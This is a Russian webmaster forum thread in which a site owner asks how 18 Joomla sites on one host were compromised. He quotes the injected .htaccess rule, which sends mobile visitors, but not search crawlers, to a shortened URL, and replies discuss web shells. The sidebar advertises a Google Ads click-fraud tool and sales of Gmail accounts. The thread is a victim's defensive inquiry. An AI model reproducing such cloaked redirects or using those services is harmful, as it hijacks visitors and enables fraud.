Взломали сайты
Страницы: 1 2 3 След.
Взломали сайты
Собственно у меня пару дней назад на 18 сайтах на джомле и на одном хостинге кто то закачал левые папки  и в .htachess прописали какой то стремный ридирект.

<IfModule mod_rewrite.c>
RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    -----goo.gl/Xxqhj-----    [L,R=302]
</IfModule>
Это вроде бы ридирект при посещении с мобильных телефонов? Кто разбирается поясните подробней если можно

Собственно у меня вопрос, как могли меня взломать? FTP на хостинге было удалено, SSH я не пользовался, остается один вариант - через админку на хостинге?  И еще такой нубский вопрос, возможно ли было взломав один сайт пробраться на хостинг? Или взломав один сайт - можно только засрать это сайт, а не другие на одном хостинге?  (этот вопрос меня больше всего волнует) Не взломали же они 18 сайтов по порядку?
Судя по датам закачек левых папок - первый раз взломали 1 февраля заразив два сайта, а 17 февраля заразили остальные 16.
Теперь сижу и думаю не могли ли они еще чего нибудь мне на сайты напихать
Изменено: Валентин Семёнов - 27 Февраля 2012 21:47
с сайт врят ли но редирект обычно во всех файлах htachess (( , а ломают с большой вероятностью через хостинг.  Было такое же...
Цитата
anna911 пишет:
с сайт врят ли но редирект обычно во всех файлах htachess (( 
Он у меня и был во всех 18 сайтах это код ридиректа. Я сперва подумал что я джомлу скачал с таким .hitaches- поглядел нет - та такого не было.
То же думаю что через админку на хостинге взломали . Как же они пароль мой узнали? подобрали ?Украли с компа вирусом? Очень это стремно когда узнав пароль от хостинга ломают сразу все сайты.
Меня уже раз ломали через FTP  ТАК Я ftp вообще удалил .  Тогда я просто бекап попросил и все сайты заново перезалил, а сейчас бекап сделать нельзя - поздно
Изменено: Валентин Семёнов - 27 Февраля 2012 22:27
Вариантов "как взломали" большое количество.
"И еще такой нубский вопрос, возможно ли было взломав один сайт пробраться на хостинг?" - думаю интересует "сможет ли злоумышленник испортить и другие на данном сервере? - да, сможет.
Исправив проблему, останется опасность того, что завтра она снова появиться. Нужно пересматривать все файлы на хостинге и начинать нужно с первого сайта, который был заражен. Скорее всего к вам залит веб шелл.
Хостинг Beget на СУПРе
Цитата
Роман пишет:
Вариантов "как взломали" большое количество.
"И еще такой нубский вопрос, возможно ли было взломав один сайт пробраться на хостинг?" - думаю интересует "сможет ли злоумышленник испортить и другие на данном сервере? - да, сможет.
Как такое возможно? То есть они могли не через хостинг взломать а через один сайт и таким образом пробраться на весь хостинг? Не могу в это поверить - то ест они закачивают на один сайт какую нибудь гадость и эта гадость по всем другим папкам с другими сайтами по хостингу лазает? Неужели такое возможно?
Цитата
пасность того, что завтра она снова появиться. Нужно пересматривать все файлы на хостинге и начинать нужно с первого сайта, который был заражен. Скорее всего к вам залит веб шелл.
Я специально разведал сколько файлов на одном сайте 10 000 - пересмотреть 18 сайтов нереально .
Если можно взломав один сайт пробраться на весь хостинг и заразить там все - я вообще в шоке . Я признаться думал что этого сделать нельзя и 100% lдумал что взломали через панель хостинга (разведав пароль)
Изменено: Валентин Семёнов - 27 Февраля 2012 22:41
Вот Вам конкретный ответ... Чел через уязвимость одного из сайтов на сервере, заливает веб шелл, с помощью которого в дальнейшем реализует свои коварные планы.... Что это такое, как оно используется и прочие вопросу тут не уместны... Пробуйте это http://www.cy-pr.com/forum/f80/t22007/ Если поможет, но в дальнейшем проблема будет повторятся, обратитесь к спецам.
Роман, спасибо за инфу. Бегло погуглил что такое веб шел и впал в отчаяние.Т о что вы описали действительно может быть . Я то буду искать,  я то буду думать. Но как себя обезопасить в будущем от заражения сразу всех сайтов. Вообщем надо держать сайты не все в одной куче, а по разным хостингам. Джумлу не так тяжело взломать - все сайты на ней.
Цитата
Валентин Семёнов пишет:
Роман, спасибо за инфу. Бегло погуглил что такое веб шел и впал в отчаяние.Т о что вы описали действительно может быть . Я то буду искать, я то буду думать. Но как себя обезопасить в будущем от заражения сразу всех сайтов. Вообщем надо держать сайты не все в одной куче, а по разным хостингам. Джумлу не так тяжело взломать - все сайты на ней - спать спокойно теперь не буду
Цитата
Потерто
Цитата
Валентин Семёнов пишет:
Джумлу не так тяжело взломать.
Зависит от спеца... Может Вас на заказ бахнули? есть за что?

з.ы. когда сайт начинает набирать популярность и это кидается в глаза, то он становиться интересен определенному кругу людей. свой доступ они могли получить еще на стадии развития и тихо сидели пока не дошло до нужного пика... так же практикуется массовое заражение сайтов шеллами с целью дальнейшей перепродажи доступов/шеллов.
Цитата
Роман пишет:
з.ы. когда сайт начинает набирать популярность и это кидается в глаза, то он становиться интересен определенному кругу людей. свой доступ они могли получить еще на стадии развития и тихо сидели пока не дошло до нужного пика.
Вы совершено правы , там был один сайт который я как раз последние пару недель усиленно двигал и рекламировал нагоняя трафик. и как раз в этом самом сайте единственном  из 18 удалили в файле .htachess строчки- код который как я  понял блокирует разные левые скрипты на сайте и другую гадость.Хотя я сомневаюсь что кому то я мог помешать и быть особым конкурентом - у меня и трафика было всего пару сотен человек в сутки . А у конкурентов немногих(пару человек), денег на нормальные сайты даже нету - куда им кого то нанимать.
От блин ..думал меня успокоят на форуме, а тут наооброт мои иллюзии развеяли. Это же полная шляпа получается
Изменено: Валентин Семёнов - 27 Февраля 2012 23:11
Joomla дырявая СMS, имхо.
Цитата
vdiapazone пишет:
Joomla дырявая СMS, имхо.З
Знаю - привык я к ней. Вчера от отчаяния пошел к hostcmc  приглядываться - так там вообще голову сломать можно. Все, теперь точно особо важные сайты буду по отдельным хостингам держать.

До последнего не хочется надеяться что взломали через админку на хостинге а не через сайт. Иначе просто придется думать о другой cms 
Изменено: Валентин Семёнов - 27 Февраля 2012 23:17
Опять же, только мой мнение, уверен налетят пряморукие и особо талантливые вебмастера, но на данный момент надёжнее Ucoza я ни чего не встречал. Делал сайты и в joomla и в DLE, удобно, php под рукой, работа с базой данных, отличные примочки, но в этом и минусы.
Страницы: 1 2 3 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
03:42 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения 
14:45 (затёр сайт)